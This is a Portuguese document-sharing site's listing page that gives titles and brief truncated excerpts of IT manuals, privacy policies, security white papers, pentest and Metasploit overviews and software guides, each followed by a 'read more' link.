Quais tipos de informações nós obteremos para este produto

Quais tipos de informações nós obteremos para este produto Termos de Uso O aplicativo Claro Facilidades faz uso de mensagens de texto (SMS), mensagens publicitárias e de serviços de internet. Nos casos em que houver uso de um serviço tarifado como, por exemplo,

Leia mais

POLÍTICA DE PRIVACIDADE CONSULTOR HND

POLÍTICA DE PRIVACIDADE CONSULTOR HND POLÍTICA DE PRIVACIDADE CONSULTOR HND 1. Princípios Gerais Esta Política de privacidade descreve como o CONSULTOR HND coleta e usa informações pessoais fornecidas no nosso site: www.consultorhnd.com.br.

Leia mais

O sistema está pedindo que eu faça meu login novamente e diz que minha sessão expirou. O que isso significa?

O sistema está pedindo que eu faça meu login novamente e diz que minha sessão expirou. O que isso significa? Que tipo de navegadores são suportados? Preciso permitir 'cookies' O que são 'cookies' da sessão? O sistema está pedindo que eu faça meu login novamente e diz que minha sessão expirou. O que isso significa?

Leia mais

Guia De Criptografia

Guia De Criptografia Guia De Criptografia Perguntas e repostas sobre a criptografia da informação pessoal Guia para aprender a criptografar sua informação. 2 O que estamos protegendo? Através da criptografia protegemos fotos,

Leia mais

Faculdade de Tecnologia SENAI Porto Alegre Aula 1

Faculdade de Tecnologia SENAI Porto Alegre Aula 1 Faculdade de Tecnologia SENAI Porto Alegre Aula 1 Prof. Me. Humberto Moura humberto@humbertomoura.com.br Evolução da TI Postura TI Níveis de TI Princípios de TI (papel da TI perante o negócio) Arquitetura

Leia mais

O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos

O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos computadores existentes numa determinada rede, permitindo

Leia mais

Inicialização Rápida do Novell Vibe Mobile

Inicialização Rápida do Novell Vibe Mobile Inicialização Rápida do Novell Vibe Mobile Março de 2015 Introdução O acesso móvel ao site do Novell Vibe pode ser desativado por seu administrador do Vibe. Se não conseguir acessar a interface móvel do

Leia mais

EXIN Cloud Computing Fundamentos

EXIN Cloud Computing Fundamentos Exame Simulado EXIN Cloud Computing Fundamentos Edição Maio 2013 Copyright 2013 EXIN Todos os direitos reservados. Nenhuma parte desta publicação pode ser publicado, reproduzido, copiado ou armazenada

Leia mais

ADOBE FLASH PLAYER 10.3 Gerenciador de configurações locais

ADOBE FLASH PLAYER 10.3 Gerenciador de configurações locais ADOBE FLASH PLAYER 10.3 Gerenciador de configurações locais PRERELEASE 03/07/2011 Avisos legais Avisos legais Para consultar avisos legais, acesse o site http://help.adobe.com/pt_br/legalnotices/index.html.

Leia mais

SMART Sync 2010 Guia prático

SMART Sync 2010 Guia prático SMART Sync 2010 Guia prático Simplificando o extraordinário Registro do produto Se você registrar o seu produto SMART, receberá notificações sobre novos recursos e atualizações de software. Registre-se

Leia mais

Guia do Usuário do Gateway do Avigilon Control Center

Guia do Usuário do Gateway do Avigilon Control Center Guia do Usuário do Gateway do Avigilon Control Center Versão: 5.2 PDF-ACCGATEWAY5-B-Rev1_PT 2013 2014 Avigilon Corporation. Todos os direitos reservados. A menos que expressamente concedida por escrito,

Leia mais

Soluções em Segurança

Soluções em Segurança Desafios das empresas no que se refere a segurança da infraestrutura de TI Dificuldade de entender os riscos aos quais a empresa está exposta na internet Risco de problemas gerados por ameaças externas

Leia mais

Proposta de pentest. O pentest realizado vai desde ataques aos servidores até testes na programação das aplicações com tentativas reais de invasão;

Proposta de pentest. O pentest realizado vai desde ataques aos servidores até testes na programação das aplicações com tentativas reais de invasão; initsec Proposta de pentest 1. O que é? Pentest (Penetration Test) é uma avaliação de maneira realista da segurança empregada em aplicações web e infraestruturas de TI no geral. O Pentest constitui da

Leia mais

CA Nimsoft Monitor Mobile

CA Nimsoft Monitor Mobile CA Nimsoft Monitor Mobile Guia do Usuário 7.0 Histórico da revisão do documento Versão do documento Data Alterações 1.0 Setembro 2013 Versão inicial do Nimsoft Mobile 7.0. Avisos legais Copyright 2013,

Leia mais

Guia do Usuário do Gateway do Avigilon Control Center. Versão 5.4.2

Guia do Usuário do Gateway do Avigilon Control Center. Versão 5.4.2 Guia do Usuário do Gateway do Avigilon Control Center Versão 5.4.2 2006-2014 Avigilon Corporation. Todos os direitos reservados. A menos que seja expressamente concedido por escrito, nenhuma licença é

Leia mais

UM NOVO CONCEITO EM HOSPEDAGEM DE DOMÍNIO

UM NOVO CONCEITO EM HOSPEDAGEM DE DOMÍNIO www.origy.com.br UM NOVO CONCEITO EM HOSPEDAGEM DE DOMÍNIO CARACTERÍSTICAS: E-MAIL IMAP * Acesso simultâneo e centralizado, via aplicativo, webmail e celular/smartphone * Alta capacidade de armazenamento

Leia mais

Seminário Sobre Reunir Registros

Seminário Sobre Reunir Registros Seminário Sobre Reunir Registros Esta lição e seus recursos de aprendizado podem ser usados para preparar um seminário de três a quatro horas sobre preparar, reunir, processar e entregar os registros a

Leia mais

Norton 360 Online Guia do Usuário

Norton 360 Online Guia do Usuário Guia do Usuário Norton 360 Online Guia do Usuário Documentação versão 1.0 Copyright 2007 Symantec Corporation. Todos os direitos reservados. O software licenciado e a documentação são considerados software

Leia mais

Controles gerais iguais aos de pacotes de softwares: Instalação, Configuração, Manutenção, Utilitários.

Controles gerais iguais aos de pacotes de softwares: Instalação, Configuração, Manutenção, Utilitários. $XWDUTXLD(GXFDFLRQDOGR9DOHGR6mR)UDQFLVFR± $(96) )DFXOGDGHGH&LrQFLDV6RFLDLVH$SOLFDGDVGH3HWUROLQD± )$&$3( &XUVRGH&LrQFLDVGD&RPSXWDomR $8',725,$'$7(&12/2*,$'$,1)250$d 2 &RQWUROHVVREUHEDQFRGHGDGRVH PLFURFRPSXWDGRUHV

Leia mais

Relatório sobre Segurança da Informação nas Empresas RESULTADOS DA AMÉRICA LATINA

Relatório sobre Segurança da Informação nas Empresas RESULTADOS DA AMÉRICA LATINA 2011 Relatório sobre Segurança da Informação nas Empresas RESULTADOS DA AMÉRICA LATINA SUMÁRIO Introdução... 4 Metodologia... 6 Resultado 1: Cibersegurança é importante para os negócios... 8 Resultado

Leia mais

Guia de Inicialização para o Windows

Guia de Inicialização para o Windows Intralinks VIA Versão 2.0 Guia de Inicialização para o Windows Suporte 24/7/365 da Intralinks EUA: +1 212 543 7800 Reino Unido: +44 (0) 20 7623 8500 Consulte a página de logon da Intralinks para obter

Leia mais

Gestão de T.I. GESTÃO DE T.I. ITIL. José Luís Padovan jlpadovan@gmail.com

Gestão de T.I. GESTÃO DE T.I. ITIL. José Luís Padovan jlpadovan@gmail.com GESTÃO DE T.I. José Luís Padovan jlpadovan@gmail.com 1 Information Technology Infrastructure Library 2 O que é o? Information Technology Infrastructure Library é uma biblioteca composta por sete livros

Leia mais

Tableau Online Segurança na nuvem

Tableau Online Segurança na nuvem Tableau Online Segurança na nuvem Autor(a): Ellie Fields Diretora Sênior de Marketing de Produtos, Tableau Software Junho de 2013 p2 A Tableau Software entende que os dados são um dos ativos mais estratégicos

Leia mais

CA ARCserve Backup PERGUNTAS MAIS FREQUENTES: ARCSERVE BACKUP R12.5

CA ARCserve Backup PERGUNTAS MAIS FREQUENTES: ARCSERVE BACKUP R12.5 PERGUNTAS MAIS FREQUENTES: ARCSERVE BACKUP R12.5 CA ARCserve Backup Este documento aborda as perguntas mais freqüentes sobre o CA ARCserve Backup r12.5. Para detalhes adicionais sobre os novos recursos

Leia mais

Segurança + Conformidade. Dentro do Prazo e Orçamento Previsto Sob Demanda

Segurança + Conformidade. Dentro do Prazo e Orçamento Previsto Sob Demanda Segurança + Conformidade Dentro do Prazo e Orçamento Previsto Sob Demanda Segurança e Conformidade via Software-as-a-Service (SaaS) Hoje em dia, é essencial para as empresas administrarem riscos de segurança

Leia mais

MDaemon GroupWare. Versão 1 Manual do Usuário. plugin para o Microsoft Outlook. Trabalhe em Equipe Usando o Outlook e o MDaemon

MDaemon GroupWare. Versão 1 Manual do Usuário. plugin para o Microsoft Outlook. Trabalhe em Equipe Usando o Outlook e o MDaemon MDaemon GroupWare plugin para o Microsoft Outlook Trabalhe em Equipe Usando o Outlook e o MDaemon Versão 1 Manual do Usuário MDaemon GroupWare Plugin for Microsoft Outlook Conteúdo 2003 Alt-N Technologies.

Leia mais

Política de segurança de rede: White Paper de práticas recomendadas

Política de segurança de rede: White Paper de práticas recomendadas Política de segurança de : White Paper de práticas recomendadas Índice Introdução Preparação Criar declarações de política de uso Realizar uma análise de risco Estabelecer uma Estrutura de Equipe de Segurança

Leia mais

CONSULTORIA E SERVIÇOS DE INFORMÁTICA

CONSULTORIA E SERVIÇOS DE INFORMÁTICA CONSULTORIA E SERVIÇOS DE INFORMÁTICA Quem Somos A Vital T.I surgiu com apenas um propósito: atender com dedicação nossos clientes. Para nós, cada cliente é especial e procuramos entender toda a dinâmica

Leia mais

Requisitos de business intelligence para TI: O que todo gerente de TI deve saber sobre as necessidades reais de usuários comerciais para BI

Requisitos de business intelligence para TI: O que todo gerente de TI deve saber sobre as necessidades reais de usuários comerciais para BI Requisitos de business intelligence para TI: O que todo gerente de TI deve saber sobre as necessidades reais de usuários comerciais para BI Janeiro de 2011 p2 Usuários comerciais e organizações precisam

Leia mais

Março 2012. Como o Eye-Fi funciona Fluxogramas da visão geral

Março 2012. Como o Eye-Fi funciona Fluxogramas da visão geral Março 2012 Como o funciona Fluxogramas da visão geral 2012 Visioneer, Inc. (licenciada da marca Xerox) Todos os direitos reservados. XEROX, XEROX and Design e DocToMe são marcas comerciais da Xerox Corporation

Leia mais

LICENCIAMENTO V14 USANDO REPRISE LICENSE MANAGER

LICENCIAMENTO V14 USANDO REPRISE LICENSE MANAGER LICENCIAMENTO V14 USANDO REPRISE LICENSE MANAGER V14 de BricsCAD vem com um novo sistema de licenciamento, com base na tecnologia de licenciamento de Reprise Software. Este novo sistema oferece um ambiente

Leia mais

Como configurar e-mails nos celulares. Ebook. Como configurar e-mails no seu celular. W3alpha - Desenvolvimento e hospedagem na internet

Como configurar e-mails nos celulares. Ebook. Como configurar e-mails no seu celular. W3alpha - Desenvolvimento e hospedagem na internet Ebook Como configurar e-mails no seu celular Este e-book irá mostrar como configurar e-mails, no seu celular. Sistemas operacionais: Android, Apple, BlackBerry, Nokia e Windows Phone Há muitos modelos

Leia mais

Kaspersky Anti-Virus 2013 Kaspersky Internet Security 2013 Lista de novos recursos

Kaspersky Anti-Virus 2013 Kaspersky Internet Security 2013 Lista de novos recursos Kaspersky Anti-Virus 2013 Kaspersky Internet Security 2013 Lista de novos recursos Sumário Visão geral de novos recursos 2 Instalação, ativação, licenciamento 2 Internet Security 3 Proteção Avançada 4

Leia mais

Contato: Kaspersky Lab ZAO 39A/3 Leningradskoe Shosse, Moscou 125212, Rússia E-mail: info@kaspersky.com

Contato: Kaspersky Lab ZAO 39A/3 Leningradskoe Shosse, Moscou 125212, Rússia E-mail: info@kaspersky.com Contato: Kaspersky Lab ZAO 39A/3 Leningradskoe Shosse, Moscou 125212, Rússia E-mail: info@kaspersky.com Suporte: http://support.kaspersky.com Informações gerais: www.kaspersky.com www.securelist.com 2013

Leia mais

Administração pela Web Para MDaemon 6.0

Administração pela Web Para MDaemon 6.0 Administração pela Web Para MDaemon 6.0 Alt-N Technologies, Ltd 1179 Corporate Drive West, #103 Arlington, TX 76006 Tel: (817) 652-0204 2002 Alt-N Technologies. Todos os Direitos Reservados. Os nomes de

Leia mais

MANUAL DO ADMINISTRADOR

MANUAL DO ADMINISTRADOR WinShare Proxy admin MANUAL DO ADMINISTRADOR Instalação do WinShare Índice 1. Instalação 2. Licenciamento 3. Atribuindo uma senha de acesso ao sistema. 4. Configurações de rede 5. Configurações do SMTP

Leia mais

GERENCIAMENTO CENTRALIZADO DELL POWERVAULT DL 2000 BASEADO EM TECNOLOGIA SYMANTEC

GERENCIAMENTO CENTRALIZADO DELL POWERVAULT DL 2000 BASEADO EM TECNOLOGIA SYMANTEC GERENCIAMENTO CENTRALIZADO DELL POWERVAULT DL 2000 BASEADO EM TECNOLOGIA SYMANTEC RESUMO EXECUTIVO O PowerVault DL2000, baseado na tecnologia Symantec Backup Exec, oferece a única solução de backup em

Leia mais

Channel. Visão Geral e Navegação. Tutorial. Atualizado com a versão 3.9

Channel. Visão Geral e Navegação. Tutorial. Atualizado com a versão 3.9 Channel Visão Geral e Navegação Tutorial Atualizado com a versão 3.9 Copyright 2009 por JExperts Tecnologia Ltda. todos direitos reservados. É proibida a reprodução deste manual sem autorização prévia

Leia mais

My Cisco Perguntas mais frequentes

My Cisco Perguntas mais frequentes 1. O que é o My Cisco? My Cisco oferece uma visão portátil e personalizável das suas informações favoritas no Cisco.com. 2. Como é possível acessar o My Cisco? Há duas formas de acessar o My Cisco: A lista

Leia mais

Certificado Digital A1

Certificado Digital A1 Abril/ Certificado Digital A1 Geração Página 1 de 32 Abril/ Pré requisitos para a geração Dispositivos de Certificação Digital Para que o processo de instalação tenha sucesso, é necessário obedecer aos

Leia mais

Configurações de Campanha

Configurações de Campanha Guia rápido sobre... Configurações de Campanha Neste guia... Aprenda a criar campanhas e a ajustar as configurações para otimizar os resultados. Índice 1. Criar Nova Campanha! 4 1.1 Dar um nome à campanha!

Leia mais

Perguntas e Respostas. Relatórios

Perguntas e Respostas. Relatórios Perguntas e Respostas 1. Por que o @ Work mudou? R: Pensando na satisfação dos nossos clientes para com os serviços via Web, foi realizado uma reformulação de toda estrutura do site otimizando a disponibilidade

Leia mais

Programa de Nível de Serviço do Ariba Cloud Services. Garantia de Acesso ao Serviço Segurança Diversos

Programa de Nível de Serviço do Ariba Cloud Services. Garantia de Acesso ao Serviço Segurança Diversos Programa de Nível de Serviço do Ariba Cloud Services Garantia de Acesso ao Serviço Segurança Diversos 1. Garantia de Acesso ao Serviço a. Aplicabilidade. A Garantia de Acesso ao Serviço cobre a Solução

Leia mais

FERRAMENTAS DE COLABORAÇÃO CORPORATIVA

FERRAMENTAS DE COLABORAÇÃO CORPORATIVA FERRAMENTAS DE COLABORAÇÃO CORPORATIVA Criação de Formulários no Google Drive Sumário (Clique sobre a opção desejada para ir direto à página correspondente) Criação de Formulários no Google Drive Introdução...

Leia mais

Manual do Aplicativo - Rastreamento Veicular

Manual do Aplicativo - Rastreamento Veicular Manual do Aplicativo - Rastreamento Veicular Sumário Apresentação... 2 Instalação do Aplicativo... 2 Localizando o aplicativo no smartphone... 5 Inserindo o link da aplicação... 6 Acessando o sistema...

Leia mais

Symantec University para Parceiros Perguntas freqüentes

Symantec University para Parceiros Perguntas freqüentes Symantec University para Parceiros Perguntas freqüentes Sumário INFORMAÇÕES GERAIS... 1 SYMANTEC UNIVERSITY PARA PARCEIROS... 1 TREINAMENTO... 2 SERVIÇO DE INFORMAÇÕES... 4 COLABORAÇÃO... 5 Informações

Leia mais

Prof. Jefferson Costa www.jeffersoncosta.com.br

Prof. Jefferson Costa www.jeffersoncosta.com.br Prof. Jefferson Costa www.jeffersoncosta.com.br Preservação da: confidencialidade: Garantia de que o acesso à informação seja obtido somente por pessoas autorizadas. integridade: Salvaguarda da exatidão

Leia mais

Fundamentos de Gestão de TI

Fundamentos de Gestão de TI Fundamentos de Gestão de TI Tópico V Transição de Serviço (ITIL V3) José Teixeira de Carvalho Neto transição de serviço transição de serviço Objetivo: orientar e coordenar o desenvolvimento e a implantação

Leia mais

Manual de SQUI Uso da Internet

Manual de SQUI Uso da Internet PE Manual de SQUI Uso da Internet Conteúdo Introdução...3 Finalidade... 3 Internet...4 Regras e Normas... 4 Monitoramento.....9 Causas à Desrespeito das Regras...10 Declaração de Acordo...11 Copyright

Leia mais

Cetac - Centro de Ensino e Treinamento em Anatomia e Cirurgia Veterinária Manual Técnico do Sistema Administrativo do site Cetacvet.com.

Cetac - Centro de Ensino e Treinamento em Anatomia e Cirurgia Veterinária Manual Técnico do Sistema Administrativo do site Cetacvet.com. Manual Técnico do Sistema Administrativo do site Cetacvet.com.br SÃO PAULO - SP SUMÁRIO Introdução... 3 Autenticação no sistema administrativo... 4 Apresentação do sistema administrativo... 5 Gerenciamento

Leia mais

O Que Fazer Se Houver Comprometimento Programa de Segurança da Informação da Conta (AIS) Fevereiro de 2006

O Que Fazer Se Houver Comprometimento Programa de Segurança da Informação da Conta (AIS) Fevereiro de 2006 Programa de Segurança da Informação da Conta (AIS) Fevereiro de 2006 Região Introdução...3 Reportando a Quebra de Segurança...4 Passos e Exigências para as Entidades Comprometidas...5 Passos e Exigências

Leia mais

Seu manual do usuário HP SLATE 10 HD 3500EF SILVER http://pt.yourpdfguides.com/dref/5512768

Seu manual do usuário HP SLATE 10 HD 3500EF SILVER http://pt.yourpdfguides.com/dref/5512768 Você pode ler as recomendações contidas no guia do usuário, no guia de técnico ou no guia de instalação para HP SLATE 10 HD 3500EF SILVER. Você vai encontrar as respostas a todas suas perguntas sobre a

Leia mais

TE T R E MOS DE E US U O Carteira de Pedidos Atualizado em e 1 7 de d Ag A o g st s o o de d 2 01 0 3

TE T R E MOS DE E US U O Carteira de Pedidos Atualizado em e 1 7 de d Ag A o g st s o o de d 2 01 0 3 TERMOS DE USO Seja bem-vindo ao Carteira de Pedidos. Recomendamos que antes de utilizar os serviços oferecidos pelo Carteira de Pedidos, leia atentamente os Termos de Uso a seguir para ficar ciente de

Leia mais

Consulte a parte de trás para obter informações sobre instalação rápida.

Consulte a parte de trás para obter informações sobre instalação rápida. Guia do Usuário Consulte a parte de trás para obter informações sobre instalação rápida. Protegemos mais usuários contra ameaças on-line do que qualquer outra empresa no mundo. Cuidar de nosso meio ambiente,

Leia mais

Novell. Novell Teaming 1.0. novdocx (pt-br) 6 April 2007 EXPLORAR O PORTLET BEM-VINDO DESCUBRA SEU CAMINHO USANDO O NOVELL TEAMING NAVIGATOR

Novell. Novell Teaming 1.0. novdocx (pt-br) 6 April 2007 EXPLORAR O PORTLET BEM-VINDO DESCUBRA SEU CAMINHO USANDO O NOVELL TEAMING NAVIGATOR Novell Teaming - Guia de início rápido Novell Teaming 1.0 Julho de 2007 INTRODUÇÃO RÁPIDA www.novell.com Novell Teaming O termo Novell Teaming neste documento se aplica a todas as versões do Novell Teaming,

Leia mais

ISO/IEC 17799. Informação

ISO/IEC 17799. Informação ISO/IEC 17799 Norma de Segurança da Norma de Segurança da Informação Segurança da Informação Segundo a norma ISO/IEC 17799, é a proteção contra um grande número de ameaças às informações, de forma a assegurar

Leia mais

Guia do Usuário. Avigilon Control Center Móvel Versão 2.0 para Android

Guia do Usuário. Avigilon Control Center Móvel Versão 2.0 para Android Guia do Usuário Avigilon Control Center Móvel Versão 2.0 para Android 2011-2015 Avigilon Corporation. Todos os direitos reservados. AVIGILON é marca comercial registrada e/ou não registrada da Avigilon

Leia mais

Manual do BlueChat 2.0 Palm

Manual do BlueChat 2.0 Palm Manual do BlueChat 2.0 Palm Copyright 2002 Palm, Inc. Todos os direitos reservados. Graffiti, HotSync e Palm OS são marcas registradas da Palm, Inc. O logotipo do HotSync, Palm e o logotipo da Palm são

Leia mais

Segurança Internet. Fernando Albuquerque. fernando@cic.unb.br www.cic.unb.br/docentes/fernando (061) 273-3589

Segurança Internet. Fernando Albuquerque. fernando@cic.unb.br www.cic.unb.br/docentes/fernando (061) 273-3589 Segurança Internet Fernando Albuquerque fernando@cic.unb.br www.cic.unb.br/docentes/fernando (061) 273-3589 Tópicos Introdução Autenticação Controle da configuração Registro dos acessos Firewalls Backups

Leia mais

Saiba Como Convencer os Executivos Sobre o Valor do Gerenciamento de Projetos. White Paper

Saiba Como Convencer os Executivos Sobre o Valor do Gerenciamento de Projetos. White Paper Saiba Como Convencer os Executivos Sobre o Valor do Gerenciamento de Projetos White Paper TenStep 2007 Saiba Como Convencer os Executivos Sobre o Valor do Gerenciamento de Projetos Não há nenhuma duvida

Leia mais

Introdução a listas - Windows SharePoint Services - Microsoft Office Online

Introdução a listas - Windows SharePoint Services - Microsoft Office Online Page 1 of 5 Windows SharePoint Services Introdução a listas Ocultar tudo Uma lista é um conjunto de informações que você compartilha com membros da equipe. Por exemplo, você pode criar uma folha de inscrição

Leia mais

Pós-Graduação em Gerenciamento de Projetos práticas do PMI

Pós-Graduação em Gerenciamento de Projetos práticas do PMI Pós-Graduação em Gerenciamento de Projetos práticas do PMI Planejamento do Gerenciamento das Comunicações (10) e das Partes Interessadas (13) PLANEJAMENTO 2 PLANEJAMENTO Sem 1 Sem 2 Sem 3 Sem 4 Sem 5 ABRIL

Leia mais

Z13 Color Jetprinter Z23 Color Jetprinter Z33 Color Jetprinter

Z13 Color Jetprinter Z23 Color Jetprinter Z33 Color Jetprinter Z13 Color Jetprinter Z23 Color Jetprinter Z33 Color Jetprinter Da instalação até a impressão Da instalação até a impressão para Windows 98, Windows Me, Windows 2000, Mac OS 8.6 à 9.1 e Mac OS X Abril 2001

Leia mais

Governança de T.I. Professor: Ernesto Junior E-mail: egpjunior@gmail.com

Governança de T.I. Professor: Ernesto Junior E-mail: egpjunior@gmail.com Governança de T.I Professor: Ernesto Junior E-mail: egpjunior@gmail.com Information Technology Infrastructure Library ITIL ITIL é um acrônimo de Information Technology Infraestruture Library. Criado em

Leia mais

Amway - Política de privacidade

Amway - Política de privacidade Amway - Política de privacidade Esta Política de Privacidade descreve como a Amway Brasil e determinadas filiadas, inclusive a Amway América Latina (conjuntamente Amway ) utilizam dados pessoais coletados

Leia mais

O que há de novo no PaperPort 12? O PaperPort 12 possui uma grande variedade de novos e valiosos recursos que ajudam a gerenciar seus documentos.

O que há de novo no PaperPort 12? O PaperPort 12 possui uma grande variedade de novos e valiosos recursos que ajudam a gerenciar seus documentos. Bem-vindo! O Nuance PaperPort é um pacote de aplicativos para gerenciamento de documentos da área de trabalho que ajuda o usuário a digitalizar, organizar, acessar, compartilhar e gerenciar documentos

Leia mais

Manual do aplicativo Conexão ao telefone

Manual do aplicativo Conexão ao telefone Manual do aplicativo Conexão ao telefone Copyright 2003 Palm, Inc. Todos os direitos reservados. O logotipo da Palm e HotSync são marcas registradas da Palm, Inc. O logotipo da HotSync e Palm são marcas

Leia mais

Guia do usuário do PrintMe Mobile 3.0

Guia do usuário do PrintMe Mobile 3.0 Guia do usuário do PrintMe Mobile 3.0 Visão geral do conteúdo Sobre o PrintMe Mobile Requisitos do sistema Impressão Solução de problemas Sobre o PrintMe Mobile O PrintMe Mobile é uma solução empresarial

Leia mais

Microsoft é uma marca registrada ou comercial da Microsoft Corporation nos Estados Unidos e/ou em outros países.

Microsoft é uma marca registrada ou comercial da Microsoft Corporation nos Estados Unidos e/ou em outros países. Este documento serve apenas para fins informativos. A MICROSOFT NÃO CONCEDE GARANTIAS EXPRESSAS, IMPLÍCITAS OU LEGAIS NO QUE DIZ RESPEITO ÀS INFORMAÇÕES NESTE DOCUMENTO. Este documento é fornecido no estado

Leia mais

Capture Pro Software. Introdução. A-61640_pt-br

Capture Pro Software. Introdução. A-61640_pt-br Capture Pro Software Introdução A-61640_pt-br Introdução ao Kodak Capture Pro Software e Capture Pro Limited Edition Instalando o software: Kodak Capture Pro Software e Network Edition... 1 Instalando

Leia mais

Última atualização em 16 de junho de 2016. Substitui a versão anterior na sua totalidade.

Última atualização em 16 de junho de 2016. Substitui a versão anterior na sua totalidade. Termos Adicionais de Uso do Document Cloud (incluindo Adobe Sign) Última atualização em 16 de junho de 2016. Substitui a versão anterior na sua totalidade. Os termos em letras maiúsculas usados nestes

Leia mais

7 Utilização do Mobile Social Gateway

7 Utilização do Mobile Social Gateway 7 Utilização do Mobile Social Gateway Existem três atores envolvidos na arquitetura do Mobile Social Gateway: desenvolvedor do framework MoSoGw: é o responsável pelo desenvolvimento de novas features,

Leia mais

Índice. Atualizado em: 01/04/2015 Página: 1

Índice. Atualizado em: 01/04/2015 Página: 1 MANUAL DO USUÁRIO Índice 1. Introdução... 3 2. Acesso ao Sistema... 4 2.1. Instalação... 4 2.1.1. Servidor - Computador Principal... 4 2.1.2. Estação - Computador na Rede... 6 2.1.3. Estação - Mapeamento

Leia mais

Estratégias para avaliação da segurança da computação em nuvens

Estratégias para avaliação da segurança da computação em nuvens Academia de Tecnologia da IBM White paper de liderança de pensamento Novembro de 2010 Estratégias para avaliação da segurança da computação em nuvens 2 Proteção da nuvem: do desenvolvimento da estratégia

Leia mais

Cliente de Acesso MicroWay. MicroWay Access Client - MWAC

Cliente de Acesso MicroWay. MicroWay Access Client - MWAC Cliente de Acesso MicroWay MicroWay Access Client - MWAC Março 2009 Cliente de Acesso MicroWay MicroWay Access Client (MWAC) Copyright 2009, MicroWay Franchising. Todos os direitos reservados. Legenda

Leia mais

Polycom RealPresence Content Sharing Suite Guia rápido do usuário

Polycom RealPresence Content Sharing Suite Guia rápido do usuário Polycom RealPresence Content Sharing Suite Guia rápido do usuário Versão 1.2 3725-69877-001 Rev.A Novembro de 2013 Neste guia, você aprenderá a compartilhar e visualizar conteúdos durante uma conferência

Leia mais

SOLUÇÕES DE RESILIÊNCIA E SEGURANÇA

SOLUÇÕES DE RESILIÊNCIA E SEGURANÇA SERVIÇO DE RESPOSTA A INCIDENTES D Solução de segurança que fornece orientações para o efetivo controle ou correção de ataques externos causados por vulnerabilidades encontradas no ambiente do cliente.

Leia mais

FileMaker Pro 12. Utilização de uma Conexão de Área de Trabalho Remota com o

FileMaker Pro 12. Utilização de uma Conexão de Área de Trabalho Remota com o FileMaker Pro 12 Utilização de uma Conexão de Área de Trabalho Remota com o FileMaker Pro 12 2007 2012 FileMaker Inc. Todos os direitos reservados. FileMaker Inc. 5201 Patrick Henry Drive Santa Clara,

Leia mais

Manual Vivo Sync. Manual do Usuário. Versão 1.0.0. Copyright Vivo 2013. http://vivosync.com.br

Manual Vivo Sync. Manual do Usuário. Versão 1.0.0. Copyright Vivo 2013. http://vivosync.com.br Manual do Usuário Versão 1.0.0 Copyright Vivo 2013 http://vivosync.com.br 1 1 Índice 1 Índice... 2 2 Vivo Sync... 5 3 Vivo Sync Web... 6 3.1 Página Inicial... 6 3.1.1 Novo Contato... 7 3.1.2 Editar Contato...

Leia mais

ADENDO DE TREINAMENTO DE CLOUD SERVICES DA ORACLE ao CONTRATO DA ORACLE PARTNERNETWORK

ADENDO DE TREINAMENTO DE CLOUD SERVICES DA ORACLE ao CONTRATO DA ORACLE PARTNERNETWORK ADENDO DE TREINAMENTO DE CLOUD SERVICES DA ORACLE ao CONTRATO DA ORACLE PARTNERNETWORK Este Adendo de Treinamento de Cloud Services da Oracle (o "adendo") é firmado entre você e a entidade da Oracle com

Leia mais

Código de prática para a gestão da segurança da informação

Código de prática para a gestão da segurança da informação Código de prática para a gestão da segurança da informação Edição e Produção: Fabiano Rabaneda Advogado, professor da Universidade Federal do Mato Grosso. Especializando em Direito Eletrônico e Tecnologia

Leia mais